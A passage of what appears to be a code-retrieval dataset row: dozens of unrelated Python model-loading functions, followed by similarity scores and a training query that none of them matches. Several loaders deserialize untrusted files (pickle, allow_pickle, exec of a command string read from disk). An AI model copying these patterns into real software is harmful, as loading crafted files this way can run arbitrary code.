data_type=kind), None, int(depth))\n self.comps_below[ident] = belows.split(\",\")\n i += 1\n\n i += 1\n\n while i < len(lines): # Connections\n name, inp, outp, kind, size = lines[i].split(\"_\")\n\n if int(name[1:]) > self.last_con:\n self.last_con = int(name[1:])\n\n self.connections[name] = Connection(inp, outp, InOut(kind, int(size)), name)\n i += 1\n self.update_below()", "def load(self, name, hidden=False):\n\n prefix = \"\"\n if hidden:\n prefix = \".\"\n load = np.load(prefix + name + \".npy\", encoding=\"latin1\", allow_pickle=True)\n self.neurons = load[0]\n self.weights = load[1]\n\n if not self.silent:\n print(\"[NoxmainNetwork]: Network \\\"\" + str(name) + \"\\\" with neurons \" + str(self.neurons) + \" loaded!\")", "def load(self):\n\n or_none = lambda x: x if x != \"none\" else None\n with h5py.File(self.filename, \"r\") as hf:\n for attr, val in hf.attrs.items():\n setattr(self, attr, or_none(val))", "def test_hdf5_load_all():\n skip_if_no_h5py()\n import h5py\n\n # save random data to HDF5\n handle, filename = tempfile.mkstemp()\n dataset = random_one_hot_dense_design_matrix(np.random.RandomState(1),\n num_examples=10, dim=5,\n num_classes=3)\n with h5py.File(filename, 'w') as f:\n f.create_dataset('X', data=dataset.get_design_matrix())\n f.create_dataset('y', data=dataset.get_targets())\n\n # instantiate Train object\n trainer = yaml_parse.load(load_all_yaml % {'filename': filename})\n trainer.main_loop()\n\n # cleanup\n os.remove(filename)", "def load_model(self, fname: str) -> None:\n checkpoint_data = torch.load(fname)\n\n # Load the models\n # P-Net\n model_import_path = checkpoint_data['p_net']['model_import_path']\n imp = importlib.import_module(model_import_path)\n mod = getattr(imp, checkpoint_data['p_net']['model_name'])\n self.p_net = mod()\n self.p_net.set_params(checkpoint_data['p_net'])\n # Q-Net\n model_import_path = checkpoint_data['q_net']['model_import_path']\n imp = importlib.import_module(model_import_path)\n mod = getattr(imp, checkpoint_data['q_net']['model_name'])\n self.q_net = mod()\n self.q_net.set_params(checkpoint_data['q_net'])", "def import_network(file_name, NetworkClass):\r\n file = open(file_name, 'br')\r\n data_pickle = file.read()\r\n file.close()\r\n net = NetworkClass()\r\n net.__dict__ = pickle.loads(data_pickle)\r\n return net", "def load_model(self, name: str):\n\n # Loading config\n self.cM = ConfigManager(name + \".cfg\")\n\n # Loading Vocabs\n out_voc = pickle.load(open(name + \".out_voc\", \"rb\"))\n in_voc = pickle.load(open(name + \".in_voc\", \"rb\"))\n\n self.output_field.vocab = out_voc\n self.input_field.vocab = in_voc\n\n num_classes = len(self.output_field.vocab)\n embed = nn.Embedding.from_pretrained(self.input_field.vocab.vectors)\n self.network = FrameIDNetwork(self.cM, embed, num_classes)\n\n self.network.load_model(name + \".ph\")", "def load_checkpoint(self, label):\n model_dir = os.path.join(\n config.results_dir, config.experiment_name, 'checkpoints')\n model_file = os.path.join(model_dir, '{}_net.pth.tar'.format(label))\n\n print(\"Loading model from {}\".format(model_file))\n model_dict = torch.load(model_file)\n\n self.use_cuda = model_dict['use_cuda']\n if self.use_cuda:\n self.net.cuda()\n\n self.net.load_state_dict(model_dict['net_state_dict'])", "def save_utility_network(self,path_save):\n print(\"Save the neural network to : \"+path_save)\n self.nn.save_on_file(path_save)", "def load_model(path):\n if os.path.isfile(path):\n print(\"=> loading checkpoint '{}'\".format(path))\n checkpoint = torch.load(path)\n\n # # size of the top layer\n # N = checkpoint['state_dict']['top_layer.bias'].size()\n #\n # # build skeleton of the model\n # sob = 'sobel.0.weight' in checkpoint['state_dict'].keys()\n # model = models.__dict__[checkpoint['arch']](sobel=sob, out=int(N[0]))\n #\n # # deal with a dataparallel table\n # def rename_key(key):\n # if not 'module' in key:\n # return key\n # return ''.join(key.split('.module'))\n #\n # checkpoint['state_dict'] = {rename_key(key): val\n # for key, val\n # in checkpoint['state_dict'].items()}\n #\n # # load weights\n # model.load_state_dict(checkpoint['state_dict'])\n # print(\"Loaded\")\n # else:\n # model = None\n # print(\"=> no checkpoint found at '{}'\".format(path))\n\n # net = models.__dict__['ResNet18'](low_dim=128)\n # net = models.__dict__['resnet18'](low_dim=128)\n\n net = models.__dict__['alexnet'](out=128)\n # net = models.__dict__['Alexnet_C'](out=args.low_dim)\n\n net = torch.nn.DataParallel(net, device_ids=range(torch.cuda.device_count()))\n net.load_state_dict(checkpoint['net'])\n\n return net", "def load_checkpoint(self, model):\n print(f\"load model {self.save_model_path}\")\n model.load_state_dict(torch.load(self.save_model_path))", "def load_model(filename):\n checkpoint = torch.load(filename)\n model = QNetwork(checkpoint['input_size'], checkpoint['output_size'], checkpoint['hidden_layers'])\n model.load_state_dict(checkpoint['state_dict'])\n return model", "def load_h5(filename: str, **kwargs):\n return open_h5(filename, 'r', **kwargs)", "def load_model(self, model_path):\n\n\t\tmodel_path = osp.abspath(model_path)\n\t\tmodel_weights_path = osp.splitext(model_path)[0] + \".bin\"\n\n\t\tself.Helpers.logger.info(\"Loading the model from '%s'\" % (model_path))\n\t\tmodel = self.context.ie_core.read_network(model_path, model_weights_path)\n\t\tself.Helpers.logger.info(\"Model loaded\")\n\n\t\treturn model", "def load_checkpoint_ram(self, checkpoint, train=True):\n # -- For all tasks, create a corresponding head, otherwise the restoring would not work due to mismatching weights -- #\n self.mh_network.add_n_tasks_and_activate(self.already_trained_on[str(self.fold)]['tasks_at_time_of_checkpoint'],\n self.already_trained_on[str(self.fold)]['active_task_at_time_of_checkpoint'])\n \n # -- Set the network to the full MultiHead_Module network to restore everything -- #\n self.network = self.mh_network\n \n # -- Use parent class to save checkpoint for MultiHead_Module model consisting of self.model, self.body and self.heads -- #\n super().load_checkpoint_ram(checkpoint, train)\n\n # -- Reset network to the assembled model to continue training -- #\n self.network = self.mh_network.model", "def load_checkpoint(model, save_path):\n model.load_state_dict(torch.load(save_path))", "def load_weights(self, file_path):\n self.model.load_weights(file_path + '/policy_network.h5')\n print(\"\\nrestored weights of the policy network.\\n\")", "def deserialize_model(hypes):\n model_path_trained = hypes['segmenter']['serialized_model_path']\n if not os.path.isfile(model_path_trained):\n logging.warning(\"No model found at '%s'.\", model_path_trained)\n network_path = hypes['segmenter']['network_path']\n network = imp.load_source('sst.network', network_path)\n trained = network.load_model(hypes)\n return trained", "def load_model(self, win_len, axis):\n\n print('Load model')\n if 'ouisir' not in self.name_dataset.lower():\n self.feature_extractor = resnet2D(\n False, 0, 0, stride=2, feature_generator=True)\n else:\n self.feature_extractor = resnet2D(\n False, 0, 0, stride=2, feature_generator=True)\n self.feature_extractor.build((None, win_len, axis, 1))\n self.feature_extractor.load_weights(\n self.path_save_model + self.name_model + '.h5', by_name=True)\n\n print('Load mean and std')\n self.mean = np.load(self.path_save_model + 'mean.npy')\n self.std = np.load(self.path_save_model + 'std.npy')", "def load(self, folder):\n # load the weights from input folder\n self.generator.load_weights('%s/generator.h5'%folder)\n self.critic.load_weights('%s/critic.h5'%folder)", "def load_model(self, filename):\n event = teca_time_py_event('teca_deeplab_ar_detect::load_model')\n\n # this creates OpenMP thread pools and imports torch\n # it must be called *before* we import torch\n self.initialize()\n\n # import our torch codes only now that torch has been initialized\n global teca_deeplab_ar_detect_internals\n from teca_deeplab_ar_detect_internals \\\n import teca_deeplab_ar_detect_internals\n\n # create an instance of the model\n model = teca_deeplab_ar_detect_internals.DeepLabv3_plus(\n n_classes=1, _print=False)\n\n # load model weights from state on disk\n super().load_model(filename, model)", "def load_model():\r\n model = MobileNetV2(weights=\"imagenet\")\r\n print(\"Model loaded\")\r\n return model", "def load_network(self, serialize_network):\n layer = self.first_layer\n current_index = 0\n for i in range(self.number_of_layers):\n for neuron in layer.neuron_array:\n number_of_weights = len(neuron.weights)\n neuron.weights = serialize_network[current_index: number_of_weights]\n neuron.bias = serialize_network[current_index + number_of_weights]\n current_index += number_of_weights + 1\n if i != self.number_of_layers - 1:\n layer = layer.next_layer", "def load(self, filename='nn_model.pkl'):\n with open(filename,'rb') as f:\n nn_model = pickle.load(f, encoding='bytes')\n f.close()\n\n self.W = nn_model.W\n self.b = nn_model.b\n\n self.num_bn_layers = nn_model.num_bn_layers\n self.bn = nn_model.num_bn_layers > 0\n self.hiddens = nn_model.hiddens\n self.nlayers = len(nn_model.hiddens) + 1\n self.input_size = nn_model.input_size\n self.output_size = nn_model.output_size\n self.activations = nn_model.activations\n self.criterion = nn_model.criterion\n self.lr = nn_model.lr\n self.momentum = nn_model.momentum\n\n if self.bn:\n self.bn_layers = nn_model.bn_layers\n\n self.train_mode = nn_model.train_mode\n self.batch_size = nn_model.batch_size\n self.epochs = nn_model.epochs", "def _load_layer_weights(self, layer, name, h5file): \n group = h5file[name]\n length = group['length'][0]\n weights = [group[\"{}\".format(idx)] for idx in range(length)]\n layer.set_weights(weights)", "def save_network(network, fpath):\n\twith open(fpath, \"wb\") as f:\n\t\tpickle.dump(network, f)", "def load_net(self, file_path):\n \twith open(file_path,'r') as f:\n \t\tparams = json.loads(f.read())\n \t#\n \tweights = np.array(params['weights'])\n \tbiases = np.array(params['biases'])\n \t# Since ann.ANN needs to be initialized with some data, which\n \t# we dont have yet, we are gonna make a canvas array with\n \t# the correct dimensions from the weights\n \tfake_data = np.array([np.zeros(len(weights[-1]))])\n \t# initialize stacked net\n \tself.init_stacked_net(fake_data)\n \t# fill in weights and biases\n \tself.stacked_net.weights = weights\n \tself.stacked_net.biases = biases", "def load(self, path):\n checkpoint = torch.load(path, map_location=torch.device(\"cpu\"))\n self.load_state_dict(checkpoint[\"state_dict\"])\n self.on_epoch_start(checkpoint[\"epoch\"])\n self.logger.info(\"Loaded controller network from %s\", path)", "def load(self):\n checkpoint = torch.load(self.checkpoint_path,\n map_location=self.net.device)\n self.load_state_dict(checkpoint)\n del checkpoint", "def _loadHDF5File(self, filename):\n matfile = h5py.File(filename)\n\n self.StokesI = np.transpose(matfile['StokesI'][:,:])\n self.StokesQ = np.transpose(matfile['StokesQ'][:,:])\n self.StokesU = np.transpose(matfile['StokesU'][:,:])\n self.StokesV = np.transpose(matfile['StokesV'][:,:])\n self.detectorPosition = matfile['detectorPosition'][:,0]\n self.detectorDirection = matfile['detectorDirection'][:,0]\n self.detectorVisang = matfile['detectorVisang'][0,0]\n\n try: self.wall = matfile['wall'][:,:]\n except KeyError: pass\n\n try: self.separatrix = matfile['separatrix'][:,:]\n except KeyError: pass", "def load_model():\n # Model reconstruction from JSON file\n with open('model/model_strides_25_13-25-54.json', 'r') as f:\n model = model_from_json(f.read())\n # Load weights into the new model\n model.load_weights('model/bestmodel_weights_strides.hdf5')\n return model", "def load(self, output_folder: str=None):\n\n # Load the genesis model.\n if output_folder is None:\n output_folder = os.path.join(os.path.dirname(__file__), 'model')\n\n # Load necessary files.\n self.n_final = pickle.load(open(os.path.join(\n output_folder, 'n_final.pkl'), 'rb'))\n self.min_values = pickle.load(open(os.path.join(\n output_folder, 'min_params.pkl'), 'rb'))\n self.norm_params = pickle.load(open(os.path.join(\n output_folder, 'norm_params.pkl'), 'rb'))\n self.label_encoder = pickle.load(open(os.path.join(\n output_folder, 'label_encoder.pkl'), 'rb'))\n\n # Load network.\n net = Net(self.n_final)\n net.to(self.device)\n\n # If a refitted model exists.\n if os.path.exists(os.path.join(output_folder, 'state_dict.refit.pt')):\n genesis_model_path = os.path.join(\n output_folder, 'state_dict.refit.pt')\n else:\n genesis_model_path = os.path.join(output_folder, 'state_dict.pt')\n\n net.load_state_dict(torch.load(genesis_model_path))\n\n '''\n # Check the number of parameters in each layer.\n for key in torch.load(genesis_model_path).keys():\n if 'bias' in key:\n print(key, torch.load(genesis_model_path)[key].shape)\n '''\n\n self.net = net", "def load_model(self):\n self.opt.load_weights_folder = os.path.expanduser(self.opt.load_weights_folder)\n\n assert os.path.isdir(self.opt.load_weights_folder), \\\n \"Cannot find folder {}\".format(self.opt.load_weights_folder)\n print(\"loading model from folder {}\".format(self.opt.load_weights_folder))\n\n for model_name in [\"encoder\", \"decoder\"]:\n print(\"Loading {} weights...\".format(model_name))\n path = os.path.join(self.opt.load_weights_folder, \"{}.pth\".format(model_name))\n model_dict = self.encoder.state_dict() if model_name == \"encoder\" else self.decoder.state_dict()\n pretrained_dict = torch.load(path)\n pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}\n model_dict.update(pretrained_dict)\n if model_name == \"encoder\":\n self.encoder.load_state_dict(model_dict)\n else:\n self.decoder.load_state_dict(model_dict)\n\n # loading adam state\n optimizer_load_path = os.path.join(self.opt.load_weights_folder, \"adam.pth\")\n if os.path.isfile(optimizer_load_path):\n print(\"Loading Adam weights\")\n optimizer_dict = torch.load(optimizer_load_path)\n self.optimizer.load_state_dict(optimizer_dict)\n else:\n print(\"Cannot find Adam weights so Adam is randomly initialized\")", "def load(self):\n if self.model is None:\n raise Exception(\"Build the model first.\")\n\n print(\"Loading model checkpoint {} ...\\n\".format(self.config[\"model\"][\"restore_model\"]))\n self.model.load_weights(self.config[\"model\"][\"restore_model\"])\n print(\"Model loaded!\")", "def load(self):\n if self.model is None:\n raise Exception(\"Build the model first.\")\n\n print(\"Loading model checkpoint {} ...\\n\".format(self.config[\"model\"][\"restore_model\"]))\n self.model.load_weights(self.config[\"model\"][\"restore_model\"])\n print(\"Model loaded!\")", "def load_net(filepath):\n\twith open(filepath, 'r') as fh:\n\t\treturn load(file = fh)", "def loadNetwork(path, arch):\n if arch in resnet.__dict__:\n model = resnet.__dict__[arch]()\n model.load_state_dict(torch.load(path, map_location=device))\n return model\n elif arch in other_resnet.__dict__:\n model = other_resnet.__dict__[arch]()\n model.load_state_dict(torch.load(path, map_location=device))\n return model\n elif arch in vgg.__dict__:\n model = vgg.__dict__[arch]()\n model.load_state_dict(torch.load(path, map_location=device))\n return model", "def load(self, filename):\n\n c = torch.load(filename)\n\n if type(c) is dict:\n sd = c['state_dict']\n self.net.load_state_dict(sd)\n if 'monitors' in c: # Remove the branching eventually\n self.monitors = c['monitors']\n else:\n self.monitors = {'loss_train': c['train_monitor'], 'loss_val': c['val_monitor'],\n 'accu_train': MetricHistory(), 'accu_val': MetricHistory()}\n if 'optimizer' in c: # Remove the branching eventually\n self.optimizer.load_state_dict(c['optimizer'])\n else:\n raise RuntimeError('Unsupported checkpoint. (Not a dict)')\n\n self.parent = filename\n self.last_checkpoint = filename\n self.start_epoch = self.monitors['loss_train'].num_epochs", "def load_network(file_name):\n with open(file_name) as file:\n data = json.load(file)\n\n cost_fn = getattr(sys.modules[__name__], data[\"cost_func\"])\n act_fn = getattr(sys.modules[__name__], data[\"act_func\"])\n metric = getattr(sys.modules[__name__], data[\"metric\"])\n\n network = Network([1, 1], act_func=act_fn, cost_func=cost_fn, metric=metric)\n network.layers_num = data[\"layers_num\"]\n network.weights = [np.array(w) for w in data[\"weights\"]]\n network.biases = [np.array(b) for b in data[\"biases\"]]\n\n return network", "def load_opcodes_subnetwork_pretrained_weights(self, model):\n print(\"ToImplement\")", "def restore_model(self, prefix):\n model_file = prefix + \".json\"\n weight_file = prefix + \".h5\"\n self.model = model_from_json(json.load(open(model_file)))\n self.model.load_weights(weight_file)\n return self\n model.load_weights(\"./output/model.h5\")", "def load_model(self, model_path, load_ae=True, map_location='cpu'):\n assert load_ae and (self.ae_net is not None), 'The trainer has not been initialized with an Autoencoder. It can thus not be loaded.'\n model_dict = torch.load(model_path, map_location=map_location)\n self.c = model_dict['c']\n self.net.load_state_dict(model_dict['net_dict'])\n\n if load_ae and (self.ae_net is not None):\n self.ae_net.load_state_dict(model_dict['ae_net_dict'])", "def load_model():\r\n global model # 下面的那个predict也是要用的 所以在这里定义为全局\r\n model = DenseNet(n_input_channels=1, num_init_features=64,\r\n growth_rate=32,\r\n block_config=(3, 6, 12, 8), num_classes=4).to(device)\r\n model.load_state_dict(torch.load(\"./model29.pkl\"))\r\n model.eval()", "def load_nn(self, filename):\n self.weights_and_biases = (np.load(filename, allow_pickle=True)).tolist()\n print('Weights and biases are loaded')", "def load_bot(self, prefix=\"model_data/\"):\n attributes = np.load(prefix + \"model_attributes.npy\",\n allow_pickle='TRUE').item()\n \n self.num_rounds = attributes[\"num_rounds\"]\n self.c = attributes[\"c\"]\n self.alpha = attributes[\"alpha\"]\n if \"loss_history\" in attributes:\n self.loss_history = attributes[\"loss_history\"]\n self.evaluation_history_old = attributes[\"evaluation_history_old\"]\n self.evaluation_history_ran = attributes[\"evaluation_history_ran\"]\n \n network_load_command = attributes[\"network_load_command\"]\n exec(network_load_command)\n self.network.load_network(prefix)", "def load(self, filename):\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n # Set biases and weights\n self.W_input_to_hidden = data['wi']\n self.W_hidden_to_hidden = data['wh']\n self.W_hidden_to_output = data['wo']", "def load_model(self, sess, pb_model_path):\n\n logging.info(\"Import yolo model from pb start .......\")\n\n with sess.as_default():\n with sess.graph.as_default():\n with tf.gfile.FastGFile(pb_model_path, 'rb') as f_handle:\n logging.info(\"ParseFromString start .......\")\n graph_def = tf.GraphDef()\n graph_def.ParseFromString(f_handle.read())\n logging.info(\"ParseFromString end .......\")\n\n tf.import_graph_def(graph_def, name='')\n logging.info(\"Import_graph_def end .......\")\n\n logging.info(\"Import yolo model from pb end .......\")", "def load_networks(self, dir_weights, idx_load):\n\n path_p = dir_weights + 'p_{}.ckpt'\n path_D = dir_weights + 'D_{}.ckpt'\n path_U = dir_weights + 'U_{}.ckpt'\n\n self.net_p.load_weights(path_p.format(idx_load))\n self.net_D.load_weights(path_D.format(idx_load))\n self.net_U.load_weights(path_U.format(idx_load))", "def load(self, filename):\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n # Set biases and weights\n self.W_input_to_hidden = data['wi']\n self.W_hidden_to_output = data['wo']", "def load_model(self, filename):\r\n pass", "def load_block(state_dict, eval_type, src_name, tgt_name, h5_dir):\n h5f = h5py.File(os.path.join(h5_dir, '{:s}_{:s}.h5'.format(eval_type, src_name)), 'r')\n\n state_dict[tgt_name + '.branch_0.conv3d.weight'] = torch.from_numpy(h5f['b0_weight'][...]).permute(4, 3, 0, 1, 2)\n output_channels = state_dict[tgt_name + '.branch_0.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_0.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_0.bn.bias'] = torch.from_numpy(h5f['b0_beta'][...])\n state_dict[tgt_name + '.branch_0.bn.running_mean'] = torch.from_numpy(h5f['b0_mv_mean'][...])\n state_dict[tgt_name + '.branch_0.bn.running_var'] = torch.from_numpy(h5f['b0_mv_var'][...])\n\n state_dict[tgt_name + '.branch_1a.conv3d.weight'] = torch.from_numpy(h5f['b1a_weight'][...]).permute(4, 3, 0, 1, 2)\n output_channels = state_dict[tgt_name + '.branch_1a.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_1a.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_1a.bn.bias'] = torch.from_numpy(h5f['b1a_beta'][...])\n state_dict[tgt_name + '.branch_1a.bn.running_mean'] = torch.from_numpy(h5f['b1a_mv_mean'][...])\n state_dict[tgt_name + '.branch_1a.bn.running_var'] = torch.from_numpy(h5f['b1a_mv_var'][...])\n state_dict[tgt_name + '.branch_1b.conv3d.weight'] = torch.from_numpy(h5f['b1b_weight'][...]).permute(4, 3, 0, 1, 2)\n output_channels = state_dict[tgt_name + '.branch_1b.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_1b.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_1b.bn.bias'] = torch.from_numpy(h5f['b1b_beta'][...])\n state_dict[tgt_name + '.branch_1b.bn.running_mean'] = torch.from_numpy(h5f['b1b_mv_mean'][...])\n state_dict[tgt_name + '.branch_1b.bn.running_var'] = torch.from_numpy(h5f['b1b_mv_var'][...])\n\n state_dict[tgt_name + '.branch_2a.conv3d.weight'] = torch.from_numpy(h5f['b2a_weight'][...]).permute(4, 3, 0, 1, 2)\n output_channels = state_dict[tgt_name + '.branch_2a.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_2a.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_2a.bn.bias'] = torch.from_numpy(h5f['b2a_beta'][...])\n state_dict[tgt_name + '.branch_2a.bn.running_mean'] = torch.from_numpy(h5f['b2a_mv_mean'][...])\n state_dict[tgt_name + '.branch_2a.bn.running_var'] = torch.from_numpy(h5f['b2a_mv_var'][...])\n state_dict[tgt_name + '.branch_2b.conv3d.weight'] = torch.from_numpy(h5f['b2b_weight'][...]).permute(4, 3, 0, 1, 2)\n output_channels = state_dict[tgt_name + '.branch_2b.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_2b.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_2b.bn.bias'] = torch.from_numpy(h5f['b2b_beta'][...])\n state_dict[tgt_name + '.branch_2b.bn.running_mean'] = torch.from_numpy(h5f['b2b_mv_mean'][...])\n state_dict[tgt_name + '.branch_2b.bn.running_var'] = torch.from_numpy(h5f['b2b_mv_var'][...])\n\n state_dict[tgt_name + '.branch_3b.conv3d.weight'] = torch.from_numpy(h5f['b3_weight'][...]).permute(4, 3, 0, 1, 2)\n output_channels = state_dict[tgt_name + '.branch_3b.conv3d.weight'].size(0)\n # Sonnet model does not scale batch norm output, it only adds bias.\n state_dict[tgt_name + '.branch_3b.bn.weight'] = torch.ones(output_channels)\n state_dict[tgt_name + '.branch_3b.bn.bias'] = torch.from_numpy(h5f['b3_beta'][...])\n state_dict[tgt_name + '.branch_3b.bn.running_mean'] = torch.from_numpy(h5f['b3_mv_mean'][...])\n state_dict[tgt_name + '.branch_3b.bn.running_var'] = torch.from_numpy(h5f['b3_mv_var'][...])", "def _load_model(self):\r\n filepath = f\"Models/{self.environment.name}/q_network\"\r\n # Check if model exists in default directory\r\n if path.exists(filepath):\r\n self.q_network = NetworkBuilder._load_model(filepath)\r\n self.target_network = NetworkBuilder._load_model(filepath)\r\n print(\"Models loaded\")\r\n return True\r\n else:\r\n print(f\"'{filepath}' not found\")\r\n return False", "def load_checkpoint(self, file):\n \"\"\"Load \"\"\"\n chkpnt = torch.load(file)\n self.load_state_dict(chkpnt['model_state_dict'])", "def load_model(model_path, model_name, net=None):\n config_file, model_file = _get_config_file(model_path, model_name), _get_model_file(model_path, model_name)\n assert os.path.isfile(\n config_file\n ), f'Could not find the config file \"{config_file}\". Are you sure this is the correct path and you have your model config stored here?'\n assert os.path.isfile(\n model_file\n ), f'Could not find the model file \"{model_file}\". Are you sure this is the correct path and you have your model stored here?'\n with open(config_file) as f:\n config_dict = json.load(f)\n if net is None:\n act_fn_name = config_dict[\"act_fn\"].pop(\"name\").lower()\n act_fn = act_fn_by_name[act_fn_name](**config_dict.pop(\"act_fn\"))\n net = BaseNetwork(act_fn=act_fn, **config_dict)\n net.load_state_dict(torch.load(model_file, map_location=device))\n return net", "def load(path_to_model):\n pass", "def load_NeuralNet(self, path_model_dir, X_train, y_train, epochs):\n\n #fetch best params\n best_params_ = self.load('best_params_', 'dill', path_model_dir) \n \n #rebuild model_dict\n model_dict = _NeuralNet.DenseNet.model_dict(**best_params_)\n model_dict['best_model'] = _NeuralNet.utils.load_model(_os.path.join(path_model_dir,'best_estimator_.h5'))\n model_dict['best_params'] = best_params_ \n model_dict['best_cv_score'] = _np.nan\n\n return model_dict", "def load_h5_file(file_path):\n # load\n fr = h5py.File(file_path, 'r')\n a_group_key = list(fr.keys())[0]\n data = list(fr[a_group_key])\n # transform to appropriate numpy array \n data=data[0:]\n data = np.stack(data, axis=0)\n return data", "def load_h5_file(file_path):\n # load\n fr = h5py.File(file_path, 'r')\n a_group_key = list(fr.keys())[0]\n data = list(fr[a_group_key])\n # transform to appropriate numpy array \n data=data[0:]\n data = np.stack(data, axis=0)\n return data", "def load(self):\n try:\n if self.model.is_cuda:\n self.model.load_state_dict(torch.load(os.path.join(self.save_path, \"save_point.pth\")))\n else:\n self.model.load_state_dict(torch.load(os.path.join(self.save_path, \\\n \"save_point.pth\"), map_location=\"cpu\"))\n except:\n sys.exit(\"Unable to load previous model\")", "def load_model(self):\n saved_path = self.config.path_tmp / self.model.model_name\n if saved_path.exists():\n self.model.load_weights(str(saved_path / 'model.vec'))", "def save_as_hdf5(self, filename):", "def load_model(self):\n print(\"=============start loading models=============\")\n # load models from basemodel and fine-tune layers\n base_model = DenseNet(reduction=0.5, classes=1000, weights_path=BASE_WEIGHT_DIR)\n base_model.layers.pop()\n base_model.layers.pop()\n x4 = Dense(6, activation='relu')(base_model.layers[-1].output)\n o = Activation('softmax')(x4)\n\n model = Model(inputs=base_model.input, outputs=[o])\n model.load_weights(WEIGHT_DIR)\n\n self.model = model\n print(\"=============finish loading models=============\")", "def load_model(self, ckpt_fn):\n checkpoint = torch.load(ckpt_fn)\n self.net_.load_state_dict(checkpoint[\"model\"])\n self.optimizer_.load_state_dict(checkpoint[\"optimizer\"])\n self.epoch_ = checkpoint[\"epoch\"]\n self.global_step_ = checkpoint[\"global_step\"]\n self.model_samples_ = deque(checkpoint[\"model_samples\"])\n self.sampler.load_state_dict(checkpoint[\"sampler_state\"])\n self.ais_loss.load_state_dict(checkpoint[\"ais_state\"])\n self.replay_prob = checkpoint[\"replay_prob\"]\n self.max_replay = checkpoint[\"max_replay\"]", "def load(filename):\n f = open(filename, \"r\")\n data = json.load(f)\n f.close()\n net = MFoMNetwork(data[\"sizes\"])\n net.weights = [np.array(w) for w in data[\"weights\"]]\n net.biases = [np.array(b) for b in data[\"biases\"]]\n return net", "def load_weight(model):\n file = h5py.File(WEIGHT_SAVE, 'r')\n weight = []\n for i in range(len(file.keys())):\n weight.append(file['weight' + str(i)][:])\n model.set_weights(weight)", "def load(self, path: str):\n self.model.load_state_dict(torch.load(path))", "def load(self, path):\n checkpoint = torch.load(path)\n self.load_state_dict(checkpoint['model_state_dict'])\n self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])", "def load(self, path):\n checkpoint = torch.load(path)\n self.load_state_dict(checkpoint['model_state_dict'])\n self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])", "def load_pretrained_network(self):\n\n if self.manager is None or self.checkpoint is None:\n return False\n status = self.checkpoint.restore(self.manager.latest_checkpoint)\n return status", "def load_pretrained_network(self):\n\n if self.manager is None or self.checkpoint is None:\n return False\n status = self.checkpoint.restore(self.manager.latest_checkpoint)\n return status", "def test_save_load(tmp_path, num_mutations):\n\n def assert_networks_equal(net, loaded_net):\n assert net.in_size == loaded_net.in_size\n assert net.out_size == loaded_net.out_size\n assert net.p_initial_connection_enabled == loaded_net.p_initial_connection_enabled\n assert net.p_add_connection == loaded_net.p_add_connection\n assert net.p_add_node == loaded_net.p_add_node\n assert net.inherit_weights == loaded_net.inherit_weights\n assert net.activation_name == loaded_net.activation_name\n assert net.neurons_in_layer == loaded_net.neurons_in_layer\n assert net.connections == loaded_net.connections\n assert np.allclose(net.weights, loaded_net.weights)\n\n net = WeightLearningNetwork(5, 2, 0.5)\n for _ in range(num_mutations):\n net.mutate()\n\n # Save network, load it and check that everything is still correct.\n print(tmp_path / 'network.json')\n net.save(tmp_path / 'network.json')\n loaded_net = WeightLearningNetwork.load(tmp_path / 'network.json')\n assert_networks_equal(net, loaded_net)\n\n # Do this again after creating and deleting weight matrices.\n net.create_torch_layers()\n net.delete_torch_layers()\n\n net.save(tmp_path / 'network2.json')\n loaded_net = WeightLearningNetwork.load(tmp_path / 'network2.json')\n assert_networks_equal(net, loaded_net)\n\n # Check that we can still create weight matrices on loaded net.\n loaded_net.create_torch_layers()" ]
[ "0.71672744", "0.7150659", "0.6883396", "0.67808", "0.6710601", "0.66247654", "0.6531737", "0.64843845", "0.64828396", "0.6471173", "0.6450578", "0.64475465", "0.6441468", "0.64281887", "0.6308086", "0.6201771", "0.6194544", "0.61861485", "0.61786836", "0.61785096", "0.6171078", "0.61476314", "0.6136227", "0.6135521", "0.61285985", "0.6118241", "0.60975796", "0.609501", "0.6089223", "0.6079766", "0.60632443", "0.605296", "0.6022471", "0.6016407", "0.6016081", "0.6014992", "0.59946185", "0.59823644", "0.59776855", "0.5959942", "0.59392554", "0.59309524", "0.59289634", "0.59218866", "0.59205014", "0.5906885", "0.58989584", "0.5891236", "0.58876747", "0.5886988", "0.5872559", "0.58720714", "0.58666897", "0.5863366", "0.58626324", "0.5846325", "0.5840275", "0.583734", "0.58101135", "0.5808156", "0.58019584", "0.5799748", "0.5798377", "0.5798377", "0.5792889", "0.5782245", "0.57789737", "0.57475543", "0.57467103", "0.57405704", "0.57350004", "0.57318735", "0.57288694", "0.5723476", "0.5719712", "0.57181966", "0.57181257", "0.57161635", "0.57042634", "0.57021797", "0.5696144", "0.5693677", "0.5683629", "0.56824213", "0.56778884", "0.56749946", "0.56749946", "0.5669785", "0.5666282", "0.5653698", "0.564323", "0.56419456", "0.5637953", "0.56283355", "0.56268466", "0.5623275", "0.5623275", "0.56098896", "0.56098896", "0.56063575" ]
0.7140678
2
Train the model for a certain no of episodes
